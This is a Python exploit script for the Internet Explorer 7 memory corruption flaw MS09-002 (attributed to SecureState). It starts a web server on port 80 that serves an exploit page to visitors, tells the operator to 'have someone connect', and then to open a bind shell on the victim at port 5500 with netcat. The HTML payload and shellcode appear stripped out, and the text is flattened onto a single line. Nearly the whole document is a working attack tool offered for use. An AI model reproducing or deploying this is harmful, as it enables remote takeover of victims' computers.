#!/usr/bin/env python ############################################################################### # MS Internet Explorer 7 Memory Corruption Exploit (MS09-002) # ############################################################################### # # # Thanks to str0ke for finding this in the wild. # # # # Tested on Windows 2003 SP2 R2 # # # # Written by SecureState R&D Team (ReL1K) # # http://www.securestate.com # # # # win32_bind EXITFUNC=seh LPORT=5500 Size=314 Encoder=ShikataGaNai Shell=bind # # # ############################################################################### from BaseHTTPServer import HTTPServer from BaseHTTPServer import BaseHTTPRequestHandler import sys try: import psyco psyco.full() except ImportError: pass class myRequestHandler(BaseHTTPRequestHandler): try: def do_GET(self): # Always Accept GET self.printCustomHTTPResponse(200) # Site root: Main Menu if self.path == "/": target=self.client_address[0] self.wfile.write("""""") self.wfile.write("""
x
""") self.wfile.write("""Microsoft Internet Explorer MS09-002 Buffer Overflow""") self.wfile.write("""

Exploit is running...


""") print ("\n\n[-] Exploit sent... [-]\n[-] Wait about 30 seconds and attempt to connect.[-]\n[-]NetCat to IP Address: %s and port 5500 [-]" % (target)) #print ("[-] Example: open up a command shell and type 'nc %s 5500' [-]" % (target)) # Print custom HTTP Response def printCustomHTTPResponse(self, respcode): self.send_response(respcode) self.send_header("Content-type", "text/html") self.send_header("Server", "myRequestHandler") self.end_headers() # In case of exceptions, pass them except Exception: pass httpd = HTTPServer(('', 80), myRequestHandler) print (""" ############################################################################### MS Internet Explorer 7 Memory Corruption Exploit (MS09-002) ############################################################################### # # # Thanks to Str0ke for finding this in the wild. # # # # Tested on Windows 2003 SP2 R2 # # # # Written by SecureState R&D Team # # http://www.securestate.com # # # # win32_bind EXITFUNC=seh LPORT=5500 Size=314 Encoder=ShikataGaNai Shell=bind # # # ############################################################################### """) print ("[-] Starting MS Internet Explorer 7 Memory Corruption Exploit:80 [-]") print ("[-] Have someone connect to you on port 80 [-]") print ("Type -c to exit..") try: # handle the connections httpd.handle_request() # Serve HTTP server forever httpd.serve_forever() # Except Keyboard Interrupts and throw custom message except KeyboardInterrupt: print ("\n\nExiting exploit...\n\n") sys.exit()